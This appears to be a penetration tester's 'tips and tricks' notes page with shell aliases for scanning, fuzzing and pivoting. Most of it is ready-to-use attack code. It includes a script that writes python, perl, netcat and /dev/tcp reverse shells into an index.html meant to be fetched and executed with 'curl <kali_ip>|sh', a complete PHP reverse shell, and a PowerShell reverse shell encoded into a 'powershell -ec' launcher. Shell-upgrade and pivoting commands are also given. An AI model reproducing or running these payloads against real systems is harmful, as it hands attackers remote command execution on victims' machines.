Tips and tricks
Tmux
tmux is a terminal multiplexer. It lets you switch easily between several programs in one terminal, detach them (they keep running in the background) and reattach them to a different terminal.
Revshells.com
Generate reverse shells for all platforms
Make use of aliases and examples
You will be 100x more efficient by using aliases of commands you use a lot, I got most aliases underneath from https://github.com/jazzpizazz/zsh-aliases.
List IP's
list_ips() {
ip a show scope global | awk '/^[0-9]+:/ { sub(/:/,"",$2); iface=$2 } /^[[:space:]]*inet / { split($2, a, "/"); print "[\033[96m" iface"\033[0m] "a[1] }'
}
Make directory and CD into it
mkdir_cd() {
mkdir $1 && cd $_
}Setup webserver
alias www="list_ips && ls_pwd && sudo python3 -m http.server 80"โโโ(kaliใฟkali)-[~/htb/Visual]
โโ$ www
[eth0] 192.168.146.129
[eth1] 192.168.178.119
[eth2] 10.10.1.130
[tun0] 10.10.14.166
[/home/kali/htb/Visual]
app.git custom hash nc64.exe rce rce.git test.git tmp winPEAS.bat winPEAS.ps1 xx
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [02/Oct/2023 05:52:25] "GET /winPEAS.bat HTTP/1.1" 200 -
Default nmap scan
This alias scans a target, and stores the output
nmap_default () {
if [ $# -eq 0 ]
then
echo "[i] Usage: nmap_default ip (options)"
else
[ ! -d "./nmap" ] && echo "[i] Creating $(pwd)/nmap..." && mkdir nmap
sudo nmap -sCV -T4 --min-rate 10000 "${@}" -v -oA nmap/tcp_default
fi
}Nmap UDP
nmap_udp () {
if [ $# -eq 0 ]
then
echo "[i] Usage: nmap_udp ip (options)"
else
[ ! -d "./nmap" ] && echo "[i] Creating $(pwd)/nmap..." && mkdir nmap
sudo nmap -sUCV -T4 --min-rate 10000 "${@}" -v -oA nmap/udp_default
fiGenerate linux reverse shells into index.html
#!/usr/bin/env python
import os, sys
payload = '''
if command -v python > /dev/null 2>&1; then
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("x.x.x.x",yyyy)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
exit;
fi
if command -v perl > /dev/null 2>&1; then
perl -e 'use Socket;$i="x.x.x.x";$p=yyyy;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
exit;
fi
if command -v nc > /dev/null 2>&1; then
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x yyyy >/tmp/f
exit;
fi
if command -v sh > /dev/null 2>&1; then
/bin/sh -i >& /dev/tcp/x.x.x.x/yyyy 0>&1
exit;
fi
'''
if(len(sys.argv) < 3):
print("[?] Usage gen_lin_rev ip port")
exit(1)
payload = payload.replace("x.x.x.x", sys.argv[1]).replace("yyyy", sys.argv[2])
with open("index.html", "w") as f:
f.write("#! /bin/sh\n\n" + payload)
print("[+] Wrote Linux reverse shells to {}/index.html".format(os.getcwd()))
I always combine this with Setup webserverto get a EZ reverse shell with Linux machine's:
curl <kali_ip>|shThis pipes index.html to sh and executes all the reverse shells possibilities.
Generate PHP reverse shell
#!/usr/bin/env python
import os, sys
payload = '''\
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'x.x.x.x';
$port = yyyy;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>'''
if(len(sys.argv) < 3):
print("[?] Usage gen_lin_rev ip port")
exit(1)
payload = payload.replace("x.x.x.x", sys.argv[1]).replace("yyyy", sys.argv[2])
with open("rev.php", "w") as f:
f.write(payload)
print("[+] Wrote PHP reverse shell to {}/rev.php".format(os.getcwd()))Generate PowerShell reverse shell
gen_ps_rev () {
if [ "$#" -ne 2 ]
then
echo "[i] Usage: gen_ps_rev ip port"
else
SHELL=`cat ~/zsh-aliases/shells/ps_rev.txt | sed s/x.x.x.x/$1/g | sed s/yyyy/$2/g | iconv -f utf8 -t utf16le | base64 -w 0`
echo "powershell -ec $SHELL" | xclip -sel clip
fi
}$TargetHost = "x.x.x.x";
$TargetPort = yyyy;
$CommandExec = "powershell"
$CommandArgs = ""
$ErrorActionPreference = "Stop";
try{
$Client = New-Object System.Net.Sockets.TcpClient;
$Client.Connect($TargetHost, $TargetPort);
$Stream = $Client.GetStream();
Write-Output "Connected!"
$Process = New-Object System.Diagnostics.Process;
$Process.StartInfo.FileName = $CommandExec
$Process.StartInfo.Arguments = $CommandArgs
$Process.StartInfo.RedirectStandardOutput = $true;
$Process.StartInfo.RedirectStandardInput = $true;
$Process.StartInfo.UseShellExecute = $false;
$Process.Start() | Out-Null;
$CharBuf = New-Object Char[] 65536;
$ByteBuf = New-Object Byte[] 65536;
Function ReadStream{ $Stream.ReadAsync($ByteBuf, 0 ,65530) }
Function ReadStdout{ $Process.StandardOutput.ReadAsync($CharBuf, 0, 65535) }
$T1 = ReadStream
$T2 = ReadStdout
while($true){
$T = [System.Threading.Tasks.Task]::WaitAny($T1, $T2)
if($T -eq 0){
if(($N = $T1.Result) -eq 0){ throw "Socket EOF."; }
while($ByteBuf[$($N-1)] -band 0x80){
if($Stream.Read($ByteBuf, $N++, 1) -eq 0){
throw "Socket EOF."
}
}
$String = [System.Text.Encoding]::UTF8.GetString($ByteBuf[0..$($N-1)])
$Process.StandardInput.Write($String);
$T1 = ReadStream
}else{
if(($N = $T2.Result) -eq 0){ throw "Process EOF."; }
$Bytes = [System.Text.Encoding]::UTF8.GetBytes($CharBuf, 0, $N)
$Stream.Write($Bytes, 0, $Bytes.Count);
$T2 = ReadStdout
}
}
}catch{
Write-Output $_.ToString()
}finally{
Write-Output "Shutting down."
try{ $Client.Close() }catch{ }
try{ $Process.Kill() }catch{ }
}
Upgrade shells
py_tty_upgrade () {
echo "python -c 'import pty;pty.spawn(\"/bin/bash\")'"| xclip -sel clip
}
py3_tty_upgrade () {
echo "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"| xclip -sel clip
}
alias script_tty_upgrade="echo '/usr/bin/script -qc /bin/bash /dev/null'| xclip -sel clip"
alias tty_fix="stty raw -echo; fg; reset"
alias tty_conf="stty -a | sed 's/;//g' | head -n 1 | sed 's/.*baud /stty /g;s/line.*//g' | xclip -sel clip"Pwncat
Will start pwncat in a env and listen on port 1337
alias pwncat='source /home/kali/pwncat-env/bin/activate;pwncat-cs 0.0.0.0:1337'Setup Ligolo
#!/usr/bin/env python
import os, sys
os.system("sudo ip tuntap add user root mode tun ligolo 2>/dev/null; sudo ip link set ligolo up 2>/dev/null")
try:
os.system(f"sudo ip route add {sys.argv[1]} dev ligolo")
print(f"[+] Successfully added {sys.argv[1]} as route")
except Exception:
print(f"[!] Error in adding route")
exit()
os.system("sudo proxy -laddr 0.0.0.0:443 -selfcert")Fuzz directories
#!/bin/bash
# Check if the URL argument is provided
if [ -z "$1" ]; then
echo "Usage: $0 <url>"
exit 1
fi
# Assign the URL to a variable
url="$1"
# Execute the feroxbuster command
feroxbuster -u "$url" -q --output dirs_and_files.txtFuzz vhosts
#!/bin/bash
# Check if the domain argument is provided
if [ -z "$1" ]; then
echo "Usage: $0 <domain>"
exit 1
fi
# Assign the domain to a variable
domain="$1"
# Run ffuf
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.$domain" -u http://$domain -acWrite your own scripts
For most things there will be a open source tool, but these tools often come with way too much functionality then actually needed. So write your own tools to prevent noise on the target. You will also be a lot more efficient if you got your own toolset.
Last updated